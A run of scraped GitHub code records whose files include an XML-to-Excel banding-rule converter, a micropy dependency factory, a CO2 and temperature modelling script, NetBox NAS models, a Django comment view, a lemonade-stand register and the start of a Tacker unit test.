print(checkWitnessB1)\n print(checkWitnessL32)\n \n ","repo_name":"wadoon/FPinTD","sub_path":"src/witnesscheck.py","file_name":"witnesscheck.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39227428674","text":"from typing_extensions import final\nimport xml.etree.ElementTree as ET\nimport io\nimport pandas as pd\nimport os\n\nfrom xml.dom.minidom import parseString\n\n\n\nsheetname=[]\ndataframe_list=[]\nside_tag_list=['band-front','band-back','band-left','band-right','band-top','band-bottom']\nrule_set_col_name = ['part-name', 'construction-type',\n 'band-front','band-back','band-left','band-right','band-top','band-bottom',\n 'raw-front','raw-back','raw-left','raw-right','raw-top','raw-bottom' ]\n\nedge_dict = {\n 'band-front':False,\n 'band-back':False,\n 'band-left':False,\n 'band-right':False,\n 'band-top':False,\n 'band-bottom':False,\n}\n\nraw_dict = {\n 'raw-front':0,\n 'raw-back':0,\n 'raw-left':0,\n 'raw-right':0,\n 'raw-top':0,\n 'raw-bottom':0,\n}\n\n\ndef forward_convert(fullpathxlsx, saveloc, filename):\n file_path = fullpathxlsx\n f = io.open(file_path, encoding=\"utf8\")\n tree = ET.parse(f)\n root = tree.getroot()\n for rule_set in root:\n sheetname.append(rule_set.attrib['name']+' protected='+rule_set.attrib['protected'])\n \n rule_set_df = pd.DataFrame(columns=rule_set_col_name)\n\n\n for rule in rule_set:\n part_name = rule.attrib['part-name']\n construction_type = rule.attrib['construction-type']\n header_dict = {'part-name':part_name, 'construction-type':construction_type}\n\n edge_dict = {\n 'band-front':False,\n 'band-back':False,\n 'band-left':False,\n 'band-right':False,\n 'band-top':False,\n 'band-bottom':False,\n }\n\n raw_dict = {\n 'raw-front':0,\n 'raw-back':0,\n 'raw-left':0,\n 'raw-right':0,\n 'raw-top':0,\n 'raw-bottom':0,\n }\n\n for side in rule:\n side_name = side.tag.split(\"}\")[1]\n side_raw = side.attrib['raw']\n side_edge = side.text\n\n edge_dict[side_name] = side_edge\n raw_dict['raw-' + side_name.split(\"-\")[1]]\n\n final_dict = {**header_dict, **edge_dict, **raw_dict}\n rule_set_df = rule_set_df.append(final_dict, ignore_index=True)\n \n dataframe_list.append(rule_set_df)\n\n\n writter=pd.ExcelWriter(saveloc+\"\\\\\"+filename[0:-4] +\"_Converted.xlsx\",engine=\"openpyxl\")\n i=0\n for df in dataframe_list:\n df.to_excel(writter,sheet_name=sheetname[i],index=False,engine=\"openpyxl\")\n i+=1\n writter.save()\n \n\ndef backward_reverse(fullpathxlsx, saveloc, filename):\n df_dict = pd.read_excel(fullpathxlsx,sheet_name=None,dtype=str)\n \n\n xml_text='''\n\\n'''\n\n\n root = ET.Element(\"banding-automatic\", xmlns=\"http://xmlns.pytha.com/banding-automatic/1.0\")\n \n\n\n for df_key in df_dict.keys():\n [name,protected] = df_key.split(' protected=')\n rule_set = ET.SubElement(root, \"rule-set\", name=name, protected=protected)\n for _,rule_row in df_dict[df_key].fillna(value=\"\").iterrows():\n rule = ET.SubElement(rule_set, \"rule\",attrib = {'construction-type':rule_row['construction-type'], 'part-name':rule_row['part-name']} )\n for side_name in ['band-front','band-back','band-left','band-right','band-top','band-bottom']:\n if rule_row[side_name] != 'False' : ET.SubElement(rule, side_name, raw=rule_row['raw-'+side_name.split('-')[1]]).text = rule_row[side_name]\n \n pass\n xml_text = xml_text + parseString(ET.tostring(root,short_empty_elements=False).decode(\"utf-8\")).childNodes[0].toprettyxml(indent=\" \")\n file1 = open(saveloc+\"\\\\\"+filename.replace(\"_Converted\",\"\")[:-5]+\".txt\", 'w')\n file1.write(xml_text)\n file1.close()\n\n\n pass\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n Method=\"0\"\n while Method != \"C\" and Method != \"R\" and Method != \"c\" and Method != \"r\" :\n Method=input(\"Convert/Revert(C/R/):\")\n if Method != \"C\" and Method != \"R\" and Method != \"c\" and Method != \"r\":\n print(\"Input C or R\")\n print(\"You input \"+Method)\n\n fullpathxlsx=input(\"File:\")\n if \"\\\"\" in fullpathxlsx:\n fullpathxlsx=fullpathxlsx[1:-1]\n saveloc, filename= os.path.split(fullpathxlsx)\n\n if Method == \"C\" or Method == \"c\":\n forward_convert(fullpathxlsx, saveloc, filename)\n elif Method == \"R\" or Method == \"r\":\n backward_reverse(fullpathxlsx, saveloc, filename)\n pass","repo_name":"podcharatee/Pytha_pattern_format","sub_path":"pytha_banding_auto.py","file_name":"pytha_banding_auto.py","file_ext":"py","file_size_in_byte":5811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22542278739","text":"\"\"\"Packages Module.\n\nAllows user to address different dependency types (package, module,\npath, pypi, etc.) through a single uniform api.\n\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Optional, Union\n\nimport requirements\n\nfrom .package import Package\nfrom .source_package import PackageDependencySource, VCSDependencySource\nfrom .source_path import LocalDependencySource\n\n\ndef create_dependency_source(\n requirement: str, name: Optional[str] = None, **kwargs: Any\n) -> Union[LocalDependencySource, PackageDependencySource, VCSDependencySource]:\n \"\"\"Factory for creating a dependency source object.\n\n Args:\n requirement (str): Package name/path/constraints in string form.\n name (str, optional): Override package name.\n Defaults to None.\n\n Returns:\n Appropriate Dependency Source\n\n \"\"\"\n req = next(requirements.parse(str(requirement)))\n if req.local_file:\n path = Path(req.path)\n name = name or path.name\n pkg = Package(name, req.specs, path=req.path)\n source = LocalDependencySource(pkg, path)\n return source\n pkg = Package(**req.__dict__)\n if pkg.vcs is not None or pkg.revision is not None:\n return VCSDependencySource(pkg, **kwargs)\n return PackageDependencySource(pkg, **kwargs)\n\n\n__all__ = [\n \"Package\",\n \"PackageDependencySource\",\n \"LocalDependencySource\",\n \"create_dependency_source\",\n]\n","repo_name":"BradenM/micropy-cli","sub_path":"micropy/packages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"3"} +{"seq_id":"37056259825","text":"from Predictions import *\r\nimport scipy.stats as stat\r\n\r\n#\r\n# Models reagent sequestration via convolution\r\n# Q0 - balance concentaration\r\n# q(t) - reagent addition (removal)\r\n# q_norm - total system volume to compute concentarations\r\n# sigma - 1/characteristic reaction time\r\n# uncertainty - sustematic error in q estimate\r\n#\r\nclass CO2_Sequestration_Analytical:\r\n def __init__( self, model_start=1800, model_end=2200):\r\n self.Interpolation = Interpolation_Realistic_2018()\r\n self.Interpolation.Solve( np.arange(model_start, 2018, 1))\r\n self.Interpolation.Correct_To_Actual(1800, 2018)\r\n self.Q_Initial = 284.0 # pre-industrial CO2 concentration, ppm\r\n self.M_atmosphere = 5.1480e9 # mln tonn\r\n self.conversion = 0.658e6 # conversion from mass ppm to ppmv\r\n self.Sigma = np.log(2) / 37\r\n self.Uncertainty = 10.0\r\n return\r\n def Solve( self, t0, q, forceActual=False):\r\n l = len(t0)\r\n self.Solution_Time = t0\r\n self.Exp = np.exp(-self.Sigma * (t0-t0[0]))\r\n self.Solution_Total = np.ones( l) * self.Q_Initial\r\n for i in range(l):\r\n tmp = q[i] / self.M_atmosphere * self.conversion * self.Exp\r\n self.Solution_Total[i:] += tmp[:l-i]\r\n if not forceActual: return np.array( self.Solution_Total)\r\n k = len(self.Interpolation.CO2)\r\n self.Solution_Total[:k] = self.Interpolation.CO2\r\n return np.array( self.Solution_Total)\r\n\r\n#\r\n# Central England Temperatures\r\n#\r\nY_CET, T_CET = Load_Calibration(\r\n \"./Data/Central_England_Temperature_Dataset.txt\",\r\n [\"Year\", \"YEAR_Average\"], separator='\\t')\r\nbaseline = np.average(T_CET[:1750-1659])\r\ndT_CET = T_CET - baseline\r\ndT_CET_30 = FilterN( dT_CET, N=31) \r\n\r\n#\r\n# Calibrations\r\n#\r\n# Resources extraction (recalculated into mlrd toe)\r\nresources = Resources()\r\nYear = np.linspace(resources.Year[0], 2200, int( 2201-resources.Year[0]))\r\nRes1 = resources.Total / 1.13 * 3.66 # Convert to CO2\r\nRes2 = np.zeros(len(Year))\r\nfor i, r in enumerate(Res1): Res2[i] = r\r\nYear_Decimated = np.linspace(1830, 2200, 75)\r\nRes_Decimated = Decimate( Res1, 5)\r\n\r\n# CO2 emissions and actual concentration\r\nCO2seq = CO2_Sequestration_Analytical( model_start=Year[0])\r\nYearRCP, RCP_8_5, RCP_6_0, RCP_4_5, RCP_2_6 = Load_Calibration(\r\n \"./Data/IPCC_Emission_Scenarios_RCP.txt\",\r\n [\"Year\", \"RCP_8_5\", \"RCP_6\", \"RCP_4_5\", \"RCP_2_6\"],\r\n separator=\"\\t\")\r\nRCP_8_5 = ArrayMerge( Res_Decimated, RCP_8_5[4:]*3660)\r\nRCP_6_0 = ArrayMerge( Res_Decimated, RCP_6_0[4:]*3660)\r\nRCP_4_5 = ArrayMerge( Res_Decimated, RCP_4_5[4:]*3660)\r\nRCP_2_6 = ArrayMerge( Res_Decimated, RCP_2_6[4:]*3660)\r\nRCP_8_5 = np.interp(Year, Year_Decimated, RCP_8_5)\r\nRCP_6_0 = np.interp(Year, Year_Decimated, RCP_6_0)\r\nRCP_4_5 = np.interp(Year, Year_Decimated, RCP_4_5)\r\nRCP_2_6 = np.interp(Year, Year_Decimated, RCP_2_6)\r\nMatr = np.ones(11)\r\nRCP_8_5 = Filter(RCP_8_5, matrix=Matr)\r\nRCP_6_0 = Filter(RCP_6_0, matrix=Matr)\r\nRCP_4_5 = Filter(RCP_4_5, matrix=Matr)\r\nRCP_2_6 = Filter(RCP_2_6, matrix=Matr)\r\n\r\n# Production models\r\nMY2018 = Interpolation_Realistic_2018()\r\nMY2018.Solve(Year)\r\nMY2018.Correct_To_Actual( 1830, 2017)\r\nERoEI_2P = Bathtub( 1965, s0=0.2, x1 = 2085, s1=0.15, middle=12852).GetVector(Year)\r\nERoEI_2P += Hubbert( 2018, 0.5, 0.1, -1600).GetVector(Year)\r\nERoEI_2P += Hubbert( 2050, 0.3, 0.14, 3070).GetVector(Year)\r\nERoEI_2P /= 1.13\r\nERoEI_2P *= 3.66\r\nSharkFin = Linear_Combo() \r\nSharkFin.Wavelets += [Hubbert( x0=2059.000, s0=0.03471, s1=0.10632, peak=16.100, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1973.000, s0=0.20589, s1=0.54487, peak=2.143, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1979.000, s0=0.65610, s1=0.31381, peak=2.252, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1989.730, s0=0.43047, s1=0.28243, peak=1.885, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2012.973, s0=0.15009, s1=0.12036, peak=2.157, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2091.892, s0=0.28243, s1=0.20589, peak=0.357, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2068.108, s0=0.34868, s1=0.31067, peak=-0.660, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=2048.108, s0=0.28243, s1=0.34868, peak=-0.353, shift=0.000)]\r\nSharkFin.Wavelets += [Hubbert( x0=1917.297, s0=0.09135, s1=0.05686, peak=0.385, shift=0.000)]\r\nRes_Shark_Fin = SharkFin.GetVector(Year) / 1.13\r\nRes_Shark_Fin *= 3660\r\n\r\n# Apply actual\r\nfor i, r in enumerate(Res1):\r\n RCP_8_5[i] = r\r\n RCP_6_0[i] = r\r\n RCP_4_5[i] = r\r\n ERoEI_2P[i] = r\r\n Res_Shark_Fin[i] = r\r\n\r\nCO2_RCP_8_5 = CO2seq.Solve( Year, RCP_8_5, True)\r\nCO2_RCP_6_0 = CO2seq.Solve( Year, RCP_6_0, True)\r\nCO2_RCP_4_5 = CO2seq.Solve( Year, RCP_4_5, True)\r\nCO2_RCP_2_6 = CO2seq.Solve( Year, RCP_2_6, True)\r\nCO2_ERoEI_2P = CO2seq.Solve( Year, ERoEI_2P, True)\r\nCO2_Shark_Fin = CO2seq.Solve( Year, Res_Shark_Fin, True)\r\n\r\nln2 = np.log(2)\r\nshift = 0.2\r\nTCR_ECS = Sigmoid( 2000, 0.05, 1.33, 1.66).GetVector(Year)\r\nTCR_ECS_err = Sigmoid( 2000, 0.05, 1.90, 2.70).GetVector(Year) - TCR_ECS \r\n#TCR_ECS = Sigmoid( 2100, 0.05, 2.5, 2.5).GetVector(Year)\r\n#TCR_ECS_err = Sigmoid( 2100, 0.05, 4.5, 4.5).GetVector(Year) - TCR_ECS \r\n#TCR_ECS = Sigmoid( 2100, 0.05, 1.66, 1.66).GetVector(Year)\r\n#TCR_ECS_err = Sigmoid( 2100, 0.05, 2.70, 2.70).GetVector(Year) - TCR_ECS \r\nlog_RCP_8_5 = np.log( CO2_RCP_8_5 / CO2seq.Q_Initial) / ln2\r\nT_RCP_8_5 = log_RCP_8_5 * TCR_ECS + shift\r\nT_RCP_8_5_err = log_RCP_8_5 * TCR_ECS_err\r\nlog_RCP_6_0 = np.log( CO2_RCP_6_0 / CO2seq.Q_Initial) / ln2\r\nT_RCP_6_0 = log_RCP_6_0 * TCR_ECS + shift\r\nT_RCP_6_0_err = log_RCP_6_0 * TCR_ECS_err\r\nlog_RCP_4_5 = np.log( CO2_RCP_4_5 / CO2seq.Q_Initial) / ln2\r\nT_RCP_4_5 = log_RCP_4_5 * TCR_ECS + shift\r\nT_RCP_4_5_err = log_RCP_4_5 * TCR_ECS_err\r\nlog_RCP_2_6 = np.log( CO2_RCP_2_6 / CO2seq.Q_Initial) / ln2\r\nT_RCP_2_6 = log_RCP_2_6 * TCR_ECS + shift\r\nT_RCP_2_6_err = log_RCP_2_6 * TCR_ECS_err\r\nT_ERoEI_2P = np.log( CO2_ERoEI_2P / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_MY2018 = np.log( MY2018.CO2 / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_ERoEI_2P = np.log( CO2_ERoEI_2P / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\nT_Shark_Fin = np.log( CO2_Shark_Fin / CO2seq.Q_Initial) / ln2 * TCR_ECS + shift\r\n\r\nlimits = 1650, 2200\r\n\r\nfig = plt.figure( figsize=(15,15))\r\ngs = plt.GridSpec(2, 1, height_ratios=[1,1])\r\nax1 = plt.subplot( gs[0])\r\nax2 = plt.subplot( gs[1])\r\n\r\nax1.set_title( \"Концентрация CO₂ в атмосфере\", fontsize=22)\r\nunc = np.ones(len(CO2seq.Interpolation.Time)) * 0.5\r\nfor i in range(126,-1,-1): unc[i] = 10 \r\nax1.errorbar( CO2seq.Interpolation.Time, CO2seq.Interpolation.CO2,\r\n yerr=unc, fmt=\".\", color=\"k\", alpha=0.2, label=\"Реальная (1830-2018)\")\r\nax1.plot( Year, CO2_RCP_8_5, \"-.\", lw=3, color=\"g\", alpha=0.2)\r\nax1.text( 2201, CO2_RCP_8_5[-1], \"8.5\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_6_0, \"--\", lw=3, color=\"g\", alpha=0.5)\r\nax1.text( 2201, CO2_RCP_6_0[-1], \"6.0\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_4_5, \"-\", lw=4, color=\"g\", alpha=0.5, label=\"IPCC RCP 2013\")\r\nax1.text( 2201, CO2_RCP_4_5[-1], \"4.5\", color=\"g\")\r\nax1.plot( Year, CO2_RCP_2_6, \"-.\", lw=3, color=\"g\", alpha=0.5)\r\nax1.text( 2201, CO2_RCP_2_6[-1], \"2.6\", color=\"g\")\r\nax1.plot( Year, MY2018.CO2, \".\", lw=2, color=\"r\", alpha=0.5, label=\"Хаббертиана, URR=1200 млрд toe\")\r\nax1.plot( Year, CO2_ERoEI_2P, \"--\", lw=4, color=\"m\", alpha=0.5, label=\"Метод ERoEI, URR=1400 млрд toe\")\r\nax1.plot( Year, CO2_Shark_Fin, \"-\", lw=4, color=\"m\", alpha=0.5, label=\"Акулий плавник, URR=1400 млрд toe\")\r\nax1.set_xlim( limits)\r\nax1.set_ylabel(\"ppmv\")\r\nax1.set_ylim( 0, 1000)\r\nax1.grid( True)\r\nax1.legend( loc=0)\r\n\r\nax2.set_title( \"Эффект Аррениуса\", fontsize=22)\r\nax2.plot( Year, T_RCP_8_5, \"-.\", lw=2, color=\"g\", alpha=0.5)\r\n#ax2.bar( Year, T_RCP_8_5_err, bottom=T_RCP_8_5, width=1, color=\"r\", alpha=0.05)\r\nax2.text( 2201, T_RCP_8_5[-1], \"8.5\", color=\"g\")\r\nax2.plot( Year, T_RCP_6_0, \"--\", lw=3, color=\"g\", alpha=0.5)\r\nax2.bar( Year, T_RCP_6_0_err, bottom=T_RCP_6_0, width=1, color=\"y\", alpha=0.2)\r\nax2.text( 2201, T_RCP_6_0[-1], \"6.0\", color=\"g\")\r\nax2.plot( Year, T_RCP_4_5, \"-\", lw=3, color=\"g\", alpha=0.5, label=\"IPCC RCP 2013\")\r\nax2.bar( Year, T_RCP_4_5_err, bottom=T_RCP_4_5-T_RCP_4_5_err, width=1, color=\"y\", alpha=0.2)\r\nax2.bar( Year, T_RCP_6_0-T_RCP_4_5, bottom=T_RCP_4_5, width=1, color=\"y\", alpha=0.2)\r\nax2.text( 2201, T_RCP_4_5[-1], \"4.5\", color=\"g\")\r\nax2.plot( Year, T_RCP_2_6, \"-.\", lw=2, color=\"g\", alpha=0.5)\r\nax2.text( 2201, T_RCP_2_6[-1], \"2.6\", color=\"g\")\r\nax2.plot( Year, T_MY2018, \".\", lw=2, color=\"r\", alpha=0.5, label=\"Хаббертиана, URR=1200 млрд toe\")\r\nax2.plot( Year, T_ERoEI_2P, \"--\", lw=4, color=\"m\", alpha=0.5, label=\"Метод ERoEI, URR=1400 млрд toe\")\r\nax2.plot( Year, T_Shark_Fin, \"-\", lw=4, color=\"m\", alpha=0.5, label=\"Акулий плавник, URR=1400 млрд toe\")\r\nax2.errorbar( Y_CET, dT_CET_30,yerr=0.46, fmt=\"o\", color=\"k\", alpha=0.2, label=\"Среднегодовые Центральной Англии (30-летний фильтр)\")\r\nax2.set_xlim( limits)\r\nax2.set_ylabel(\"°Ц от среднего до 1750 года\")\r\nax2.set_ylim( -1, 3.5)\r\nax2.grid( True)\r\nax2.legend( loc=0)\r\nax2.set_xlabel(\"год\")\r\n\r\nplt.savefig( \"./Graphs/figure_18_05.png\")\r\nif InteractiveModeOn: plt.show(True)\r\n","repo_name":"myak555/LIMITS_TO_LIMITS","sub_path":"Chapter 18/Test_05_CO2_Accumulation.py","file_name":"Test_05_CO2_Accumulation.py","file_ext":"py","file_size_in_byte":9315,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"31278849815","text":"from django.contrib.contenttypes.fields import GenericRelation\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models\nfrom django.urls import reverse\nfrom netbox.models import NetBoxModel\nfrom tenancy.models import Tenant, ContactAssignment\nfrom ipam.models import Prefix, IPAddress\nfrom dcim.models import Device\nfrom utilities.choices import ChoiceSet\nfrom utilities.forms.fields import CommentField, DynamicModelChoiceField, DynamicModelMultipleChoiceField\n\nclass NASVolumeSecurityStyleChoices(ChoiceSet):\n CHOICES = [\n ('unix', 'UNIX'),\n ('windows', 'Windows'),\n ]\n\nclass NASShareTypeChoices(ChoiceSet):\n CHOICES = [\n ('nfs', 'NFS', 'orange'),\n ('smb', 'SMB/CIFS', 'green'),\n ('gpfs', 'GPFS', 'blue'),\n ('cephfs', 'CephFS', 'purple'),\n ]\n\nclass NASShareAccessLevelChoices(ChoiceSet):\n CHOICES = [\n ('rw', 'Read/Write'),\n ('ro', 'Read-Only'),\n ]\n\nclass NASCluster(NetBoxModel):\n name = models.CharField(\n max_length=100,\n unique=True\n )\n\n devices = models.ManyToManyField(\n to='dcim.Device',\n related_name='devices',\n blank=True,\n verbose_name='Devices'\n )\n\n access_ips = models.ManyToManyField(\n to='ipam.IPAddress',\n related_name='nas_cluster_access_ips',\n blank=True,\n verbose_name='Access IPs'\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_clusters',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('name',)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nascluster', args=[self.pk])\n\nclass NASVolume(NetBoxModel):\n nas_cluster = models.ForeignKey(\n to=NASCluster,\n on_delete=models.PROTECT,\n related_name='volumes'\n )\n\n name = models.CharField(\n max_length=100\n )\n\n export_id = models.PositiveIntegerField()\n\n owner = models.CharField(\n max_length=100\n )\n\n group = models.CharField(\n max_length=100\n )\n\n size_gb = models.PositiveIntegerField()\n\n local_directory = models.CharField(\n max_length=200\n )\n\n security_style = models.CharField(\n max_length=30,\n choices=NASVolumeSecurityStyleChoices,\n default='unix'\n )\n\n base_unix_permissions = models.CharField(\n max_length=100,\n default='2770'\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_volumes',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_cluster', 'local_directory')\n unique_together = (\n ('nas_cluster', 'local_directory'),\n ('nas_cluster', 'export_id'),\n )\n\n def __str__(self):\n return f'{self.nas_cluster}: {self.local_directory}'\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasvolume', args=[self.pk])\n\nclass NASShare(NetBoxModel):\n nas_volume = models.ForeignKey(\n to=NASVolume,\n on_delete=models.PROTECT,\n related_name='shares'\n )\n\n name = models.CharField(\n max_length=50\n )\n\n volume_subdirectory = models.CharField(\n max_length=200,\n default='/'\n )\n\n type = models.CharField(\n max_length=30,\n choices=NASShareTypeChoices\n )\n\n mount_options = models.CharField(\n max_length=100,\n blank=True\n )\n\n access_level = models.CharField(\n max_length=30,\n choices=NASShareAccessLevelChoices,\n default='rw'\n )\n\n access_prefixes = models.ManyToManyField(\n to='ipam.Prefix',\n related_name='nas_share_access_prefixes',\n blank=True,\n verbose_name='Access Prefixes'\n )\n\n access_ips = models.ManyToManyField(\n to='ipam.IPAddress',\n related_name='nas_share_access_ips',\n blank=True,\n verbose_name='Access IPs'\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_shares',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_volume', 'name')\n unique_together = ('nas_volume', 'name')\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasshare', args=[self.pk])\n\nclass NASMount(NetBoxModel):\n nas_share = models.ForeignKey(\n to=NASShare,\n on_delete=models.PROTECT,\n related_name='mounts'\n )\n\n devices = models.ManyToManyField(\n to='dcim.Device',\n related_name='nas_mount_devices',\n blank=True,\n verbose_name='Devices'\n )\n\n virtual_machines = models.ManyToManyField(\n to='virtualization.VirtualMachine',\n related_name='nas_mount_virtual_machines',\n blank=True,\n verbose_name='Virtual Machines'\n )\n\n local_directory = models.CharField(\n max_length=200\n )\n\n mount_options = models.CharField(\n max_length=100,\n blank=True\n )\n\n description = models.CharField(\n max_length=500,\n blank=True\n )\n\n comments = models.TextField(\n blank=True\n )\n\n contacts = GenericRelation(\n to=ContactAssignment\n )\n\n tenant = models.ForeignKey(\n to=Tenant,\n on_delete=models.PROTECT,\n related_name='nas_mounts',\n blank = True,\n null = True\n )\n\n class Meta:\n ordering = ('nas_share', 'local_directory')\n unique_together = ('nas_share', 'local_directory')\n\n def __str__(self):\n return f'{self.nas_share}: {self.local_directory}'\n\n def get_absolute_url(self):\n return reverse('plugins:netbox_nas:nasmount', args=[self.pk])\n","repo_name":"wutcat/netbox-nas","sub_path":"netbox_nas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"24548321945","text":"from django.shortcuts import render,get_object_or_404,redirect,reverse\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom .forms import CommentForm\nfrom blogtest.models import Post\n\n# Create your views here.\n\n\n\ndef comitcoment(request,id):\n \"\"\"评论功能\"\"\"\n post = get_object_or_404(Post,pk=id)\n if request.method == \"POST\":\n comment = CommentForm(request.POST)\n if comment.is_valid():\n comment = comment.save(commit=False)\n comment.post = post\n comment.save()\n return redirect(reverse('blogtest:detail',args=(id,)))\n else:\n return HttpResponse('评论失败')","repo_name":"Wlh12345678/Django","sub_path":"blog/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5613395897","text":"def get_order():\n item = input()\n if not item:\n return '00'\n if item == 'Q':\n return 'QQ'\n quantity = int(input('How many? '))\n return item, quantity\n \nregister = 0\norder = ''\nprices = 50, 75, 100\n\nprint('Lemonade Stand starting up...')\nprint('Ready to take orders!')\n\nwhile 1:\n print('What would you like to order (1-3)? One at a time, please.')\n print('1. Glass of lemonade - $0.50\\n'\n '2. Glass of grapefruit juice - $0.75\\n'\n '3. Cookie - $1.00')\n item, quantity = get_order()\n if item == 'Q':\n break\n if item == '0':\n quantities = list(order.count(obj) for obj in '123')\n for name,number,price in zip(('Glasses of lemonade', 'Glasses of grapefruit juice', 'Cookies'),\n quantities,\n prices):\n if number:\n print('{}: {}. ${:.02f}'.format(name, number, number*price/100))\n total = sum(name*number for name,number in zip(quantities, prices))\n register += total\n print('Total: ${:.02f}'.format(total/100))\n tendered = int(input('Input cash (n.nn): ').replace('.', '').lstrip('0'))\n change = tendered - total\n denominations = ('Fifties', 'Twenties', 'Tens', 'Fives', 'Ones',\n 'Quarters', 'Dimes', 'Nickels', 'Pennies')\n user_denominations = {}\n dollars, cents = divmod(change, 100)\n user_denominations['Fifties'], dollars = divmod(dollars, 50)\n user_denominations['Twenties'], dollars = divmod(dollars, 20)\n user_denominations['Tens'], dollars = divmod(dollars, 10)\n user_denominations['Fives'], user_denominations['Ones'] = divmod(dollars, 5)\n user_denominations['Quarters'], cents = divmod(cents, 25)\n user_denominations['Dimes'], cents = divmod(cents, 10)\n user_denominations['Nickels'], user_denominations['Pennies'] = divmod(cents, 5)\n if any(user_denominations.values()):\n print('Your change:')\n for denomination in denominations:\n quant = user_denominations[denomination]\n if quant:\n print('{}: {}'.format(denomination, quant))\n order = ''\n else:\n order += item*quantity\n\nprint(\"Today's total: ${:.02f}\".format(register/100))","repo_name":"TigerhawkT3/small_scripts","sub_path":"lemonade_stand.py","file_name":"lemonade_stand.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"3"} +{"seq_id":"72360463763","text":"from tacker import context\nfrom tacker.sol_refactored.common import exceptions as sol_ex\nfrom tacker.sol_refactored.common import monitoring_plugin_base as mon_base\nfrom tacker.sol_refactored.common import server_notification\nfrom tacker.sol_refactored.common import vnf_instance_utils as inst_utils\nfrom tacker.sol_refactored import objects\nfrom tacker.tests.unit import base\n\nfrom unittest import mock\n\n_inst1 = {\n 'id': 'test_id',\n 'vnfdId': 'vnfdId',\n 'vnfProvider': 'vnfProvider',\n 'vnfProductName': 'vnfProductName',\n 'vnfSoftwareVersion': 'vnfSoftwareVersion',\n 'vnfdVersion': 'vnfdVersion',\n 'instantiationState': 'NOT_INSTANTIATED',\n 'instantiatedVnfInfo': {\n 'id': 'id',\n 'vduId': 'vduId',\n 'vnfcResourceInfo': [\n {\n 'id': 'vnfc_resource_id1',\n 'vduId': 'vduId',\n 'computeResource': {},\n 'metadata': {\n \"server_notification\": {\n \"alarmId\": \"alarm_id\"\n }\n }\n }, {\n 'id': 'vnfc_resource_id2',\n 'vduId': 'vduId2',\n 'computeResource': {},\n 'metadata': {\n \"server_notification\": {\n \"alarmId\": \"alarm_id2\"\n }\n }\n }\n ],\n 'vnfcInfo': [{\n 'id': 'vnfc_info1',\n 'vduId': 'vdu_id',\n 'vnfcResourceInfoId': 'vnfc_resource_id1',\n 'vnfcState': 'STARTED'\n }],\n 'metadata': {\n 'ServerNotifierUri': 'ServerNotifierUri',\n 'ServerNotifierFaultID': ['1111', '1234']\n }\n }\n}\n\n_body = {\n 'notification': {\n 'alarm_id': 'alarm_id',\n 'fault_id': '1234',\n 'fault_type': '10',\n }\n}\n\n\nclass TestServerNotification(base.TestCase):\n def setUp(self):\n super(TestServerNotification, self).setUp()\n objects.register_all()\n self.context = context.get_admin_context()\n self.request = mock.Mock()\n self.request.context = self.context\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n\n def tearDown(self):\n super(TestServerNotification, self).tearDown()\n server_notification.ServerNotification._instance = None\n\n @mock.patch.object(inst_utils, 'get_inst')\n def test_notify(self,\n mock_inst):\n self.config_fixture.config(\n group='server_notification', server_notification=True)\n server_notification.ServerNotification._instance = None\n sn = mon_base.MonitoringPlugin.get_instance(\n server_notification.ServerNotification)\n\n mock_inst.return_value = objects.VnfInstanceV2.from_dict(_inst1)\n sn.notify(self.request, 'test_id', body=_body)\n\n @mock.patch.object(inst_utils, 'get_inst')\n def test_notify_no_callback(self,\n mock_inst):\n 